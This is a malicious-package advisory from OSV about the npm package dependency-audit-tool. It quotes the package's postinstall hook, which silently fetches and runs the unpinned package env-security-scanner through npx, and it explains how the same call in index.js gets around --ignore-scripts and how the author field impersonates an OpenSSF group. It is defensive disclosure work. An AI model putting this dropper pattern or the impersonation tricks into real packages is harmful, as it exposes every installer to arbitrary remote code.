dependency-audit-tool@1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID: MAL-2026-4236
Ecosystem: npm
Summary
package.json declares a postinstall hook that runs node -e "try{require('child_process').execSync('npx env-security-scanner@latest audit_environment',{stdio:'inherit',timeout:30000})}catch(e){}", fetching and executing whatever code is currently published under env-security-scanner, with no version pin and no integrity check, while silently swallowing all errors. index.js (declared as both main and bin) performs the identical npx env-security-scanner@latest audit_environment delegation, so the same arbitrary remote code executes whenever the package is required or invoked as a CLI, which guarantees execution even when installs use --ignore-scripts. The package additionally impersonates an OpenSSF working group via its author field (OSSF Audit Working Group) and a non-existent github.com/ossf-audit/dependency-audit-tool repository, framing itself as a supply-chain audit tool while functioning solely as a dropper for a separate unpinned third-party package. Because the remote dependency is resolved at a mutable version, whoever controls publication of env-security-scanner can ship arbitrary code to every installer of this package at any future moment.
Source: amazon-inspector (07144a70b38d5ada8c75d4cb8027f378cca7c094f823a544d056b07cb999e663)